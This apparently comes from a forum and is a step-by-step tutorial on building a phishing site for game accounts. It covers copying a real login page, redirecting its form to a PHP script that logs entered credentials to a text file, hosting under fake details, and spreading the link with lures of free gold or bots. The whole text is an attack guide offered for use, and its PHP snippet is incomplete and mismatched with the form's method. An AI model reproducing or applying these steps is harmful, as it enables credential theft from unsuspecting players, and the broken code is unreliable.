[HOW] Make your own phisher [HOW]

Using A Phishing Site​
What is a phishing site? A phishing site is a site meant to look like the real site convincing someone to enter their personal information, you can then view there information at your will. Be warned that this is very illegal but for games they most likely won’t do anything about it.
First things first you must choose the site which you want to make a phishing site from.
When you found your site right click on it and say "view page source" and save it on your desktop as index.html
Open the "index.html" with notepad and search the source for the word "action". you should find a command looking like this
<form action="RANDOM URL" method="post" autocomplete="off">
then change the url (in this case "RANDOM URL") to "next.php" then resave index.html
Then you need to sign up for free hosting at t35.com (you might wanna use https://x10hosting.com/) and use fake info, name your website something convincing like officalgamepage.t35. Or you can change the site name using this link
Then login to t35 and go to website manager and upload index.html.
Create a new file called next.php and copy / paste this:
header("Location: http://WEBSITE ");
$handle =
fopen("pass.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
Then change http://Website to where you want the user to go after they login on your site. Then save it as next.php
Then create a new file called pass.txt and you’re done, try your site out, when you want to read your logs open pass.txt and you can read what they entered.
You then need to spread your link, you can pm people it and say go here for gold or say go here for free bots for the game. Also if you can post links on the games official forums do so.